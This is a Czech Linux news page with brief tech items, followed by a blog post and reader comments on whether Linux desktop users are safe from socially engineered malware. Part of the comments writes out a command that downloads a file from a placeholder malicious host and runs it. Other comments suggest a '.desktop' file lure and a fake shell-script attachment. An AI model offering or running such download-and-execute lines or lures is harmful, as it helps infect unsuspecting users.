Typst byl vydán ve verzi 0.14. Jedná se o rozšiřitelný značkovací jazyk a překladač pro vytváření dokumentů včetně odborných textů s matematickými vzorci, diagramy či bibliografií.
Specialisté společnosti ESET zaznamenali útočnou kampaň, která cílí na uživatele a uživatelky v Česku a na Slovensku. Útočníci po telefonu zmanipulují oběť ke stažení falešné aplikace údajně od České národní banky (ČNB) nebo Národní banky Slovenska (NBS), přiložení platební karty k telefonu a zadání PINu. Malware poté v reálném čase přenese data z karty útočníkovi, který je bezkontaktně zneužije u bankomatu nebo na platebním terminálu.
V Ubuntu 25.10 byl balíček základních nástrojů gnu-coreutils nahrazen balíčkem rust-coreutils se základními nástroji přepsanými do Rustu. Ukázalo se, že nový "date" znefunkčnil automatickou aktualizaci. Pro obnovu je nutno balíček rust-coreutils manuálně aktualizovat.
VST 3 je nově pod licencí MIT. S verzí 3.8.0 proběhlo přelicencování zdrojových kódů z licencí "Proprietary Steinberg VST3 License" a "General Public License (GPL) Version 3". VST (Virtual Studio Technology, Wikipedie) je softwarové rozhraní pro komunikaci mezi hostitelským programem a zásuvnými moduly (pluginy), kde tyto moduly slouží ke generování a úpravě digitálního audio signálu.
Open source 3D herní a simulační engine Open 3D Engine (O3DE) byl vydán v nové verzi 25.10. Podrobný přehled novinek v poznámkách k vydání.
V Londýně probíhá dvoudenní Ubuntu Summit 25.10. Na programu je řada zajímavých přednášek. Zhlédnout je lze také na YouTube (23. 10. a 24. 10.).
Gemini CLI umožňuje používání AI Gemini přímo v terminálu. Vydána byla verze 0.10.0.
Konference OpenAlt 2025 proběhne již příští víkend 1. a 2. listopadu v Brně. Nabídne přibližně 80 přednášek a workshopů rozdělených do 7 tematických tracků. Program se může ještě mírně měnit až do samotné konference, a to s ohledem na opožděné úpravy abstraktů i případné podzimní virózy. Díky partnerům je vstup na konferenci zdarma. Registrace není nutná. Vyplnění formuláře však pomůže s lepším plánováním dalších ročníků konference.
Samsung představil headset Galaxy XR se 4K Micro-OLED displeji, procesorem Snapdragon XR2+ Gen 2, 16 GB RAM, 256 GB úložištěm, operačním systémem Android XR a Gemini AI.
Před konferencí Next.js Conf 2025 bylo oznámeno vydání nové verze 16 open source frameworku Next.js (Wikipedie) pro psaní webových aplikací v Reactu. Přehled novinek v příspěvku na blogu.
Poté, co pan Kaspersky na root.cz pronesl, že počet virů bude stoupat s nárůstem uživatelů Linuxu, strhla se vlna příspěvků, které ho odsoudili. Jenže, je (a bude) Linux a především jeho uživatelé v bezpečí?
Význam slova (počítačový) vir prošel časem jistou proměnou. Za dávných časů MS-DOSu existovaly viry jako OneHalf, Pieczk, které napadaly bootsektory disket, rezidentně se schovávaly v paměti a chovaly se polymorfně. Všeobecně to byly velmi sofistikované kusy kódu, navíc s destruktivními účinky.
Ovšem doba pokročila. Dnes se běžně pod pojem vir schová spyware, červ, nebo jakýkoli jiný, zákeřný kód zhusta vygenerovaný nějakým scriptkiddie ve VisualBasicu. Odborníci sice protestují a používají termíny přesně, ale jsou v přesile (a koneckonců máme demokracii
) a je to častem zdrojem nedorozumění.
Doba změnila i účel těchto aplikací. Místo destruktivní činnosti se zaměřují na posílání spamů, sledování uživatele, zobrazování reklam, nebo obecně slouží jako jednotka v nějakém tom botnetu
Takže pojmem vir obecně označuje libovolný škodlivý kód a já ho budu v tomto významu používat i nadále.
Mnoho virů se šíří automaticky kdysi po disketách, dnes po síti. Ovšem trojské koně, nebo spyware, je často součástí nějaké aplikace. Nástupu ILOVEYOU ukázal, že místo složitých technik je jednodušší prostě použít sociálního inženýrství a nechat uživatele, ať si kód posílejí sami.
Klasické viry typu OneHalf - vůči nim je Linux díky svojí unixové architektuře odolný. Systém oddělených práv v kombinaci s aktualizovaným systémem a velkou heterogenitou těchto systémů neumožňují psát viry, které by se mohly víc šířit - seznam linuxových virů
Červy - jsou velice podobné virům, ale klasicky se takto označují ty programy, které se šíří prostřednictvím sítě. Unixové systémy nejsou proti těmto útokům odolné, ale rychlé bezpečnostní aktualizace spolu s velkou heterogenitou nedávají těmto potvůrkám velkou šanci. Navíc, útoky jsou vesměs vedeny proti známým děravým programům typu ftp servery, nebo bind, které proto mnozí správci ponechávají v chrootu.
Z hlediska správce serveru jsou tyto útoky významné, z hlediska desktopového uživatele už méně (pokud si aktualizuje distribuci, je téměř bez šance mu nakazit systém)
Na desktopu v současnosti používají Linux vesměs geekové, takže vytvářet ILOVEOYU.sh je úplně zbytečné, protože si to nikdo nespustí. Jenže, pokud jej bude používat každá sekretářka, bude se ILOVEYOU.sh spouštět i tam. Jediným rozdílem je, že je na Linuxu řádově složitější takový program spustit, ale v momentě, kdy bude v emailu od kamarádky napsaný návod, pravděpodobnost spuštění vzroste.
Navíc, každý správný unix nabízí dostatek prostoru pro oběšení uživatele. Takové KDE se svým DCOPem nabízí takové možnosti, nad nimiž by se bastličům ve VBS asi protočily panenky. Jakmile nastoupí DBUS, bude mít každý vir, který nějak uživatele donutí, aby jej spustil, prakticky ráj na zemi. Prohlížeče pravidelně ukazující zadané weby, dialogová okna s reklamou, a kdo ví, co všechno tyto lidi napadne.
Linux jako systém je vůči škodlivému kódu odolný. Nemusíme se bát automaticky spouštěných příloh, nebo naboření systému. Máme balíčky, máme unixovou architekturu, atd. A v současnosti je většina linuxáků počítačovými odborníky, co nespouštějí každou blbost.
Ovšem na co dnes rozhodně není nikdo připraven je situace, až začnou negeekům chodit emaily typu
To view naked Paris Hilton, save an attachment and type 'sh paris_naked.sh'a budou volat vás, kteří budete budete muset počítač od toho nějak vyčistit (a poslouchat řeči "vždyť jsi říkal, že na tom Linuxu nemají být viry"). A před neznalostí/hloupostí uživatele nedokáže chránit žádný systém (který by šlo zároveň používat).
Tiskni
Sdílej:
sh paris-hilton.wmv.
Ale nejlepší bude, použít takové ty .desktop soubory (z ~/Desktop), protože lidi si často ukládají věci na plochu. Ty mají samozřejmě i položku Exec...
wget "http://bad.site/virus -O /tmp/virus"; sh /tmp/virus ...
Někdy přemýšlím, jestli náhodou sami neplatí za vývoj(nebo nevyvyjí) virů
, aby si každý musel koupit jejich skvělý produkt který ochrání jeho počítač
0K1AS
PS: Osobně mně tedy přijde, že ani na Windows(XP SP2,bez WinUpdate) zkušenější uživatel nepotřebuje antivirus. Stačí nespouště exe které člověk si nestahnul z ověřených zdrojů. Samozřejmě i tak je dobré jednou za pl roku to něčím zkontrolovat, ale po 2 letech jsem nepotkal ani virus.
PS: Osobně mně tedy přijde, že ani na Windows(XP SP2,bez WinUpdate) zkušenější uživatel nepotřebuje antivirus. Stačí nespouště exeNení to tak dávno, co se Windowsy hromadně nakazily pouze surfováním po netu - rozhodně nebylo třeba spouštět žádné .exe. To byl takovej ten virus, co po čase rebootnul systém... je to několik málo let a bylo to opravdu všude. Dokonce obchody nabízely (nevím jestli u nás, ale v Německu ano) k nedávno prodaným počítačům CD s aktualizací a pomocným programem.
.
, ale FireFox
Když selžou všechny pokusy uvést zařízení do provozu, je dobré přečíst si návod.Není to tak dávno, co se Windowsy hromadně nakazily pouze surfováním po netu - rozhodně nebylo třeba spouštět žádné .exe. To byl takovej ten virus, co po čase rebootnul systém... je to několik málo let a bylo to opravdu všude.To je ta méně závažná polovina. Ve skutečnosti je tato díra zajímavější tím, že na ni existoval Windows exploit jak pro script kiddie, kam stačilo zadat pouze cílovou IP adresu a vyskočil vzdálený příkazový řádek. Jmenovalo se to nějak na způsob DCOM RPC Exploit by DarkSideOfKalez. A tomu restartu šlo zabránit nějakým přepínačem od shutdown, tuším shutdown /k nebo shutdown /i.
. Firmy jak Symantec apod. nevydělavají díky nějakým zkušeným haxourům, kteří píší sofistikované viry, ale vydělávají jen a pouze na blbosti uživatelů.
.
Jinak hezky sepsane.
Zkusil, většinou segfaultovaly, nebo na něčem spadly, ale pár se jich zdálo spustitelných. ;)
Paris.Hilton.desktop (sh, py, pl, ...) tak to poslední, co udělám je, že na to kliknu, dokud nezjistím, o co jde
Takto se asi zachová většina uživatelů.
Na druhou stranu, co se asi stane, až přijde mojí přítelkyni email od kamarádky s přílohou Brad.Pitt.desktop s instrukcemi, ulož na plochu a klikni?
Na druhou stranu, co se asi stane, až přijde mojí přítelkyni email od kamarádky s přílohouPak Linux zvítězilBrad.Pitt.desktops instrukcemi, ulož na plochu a klikni?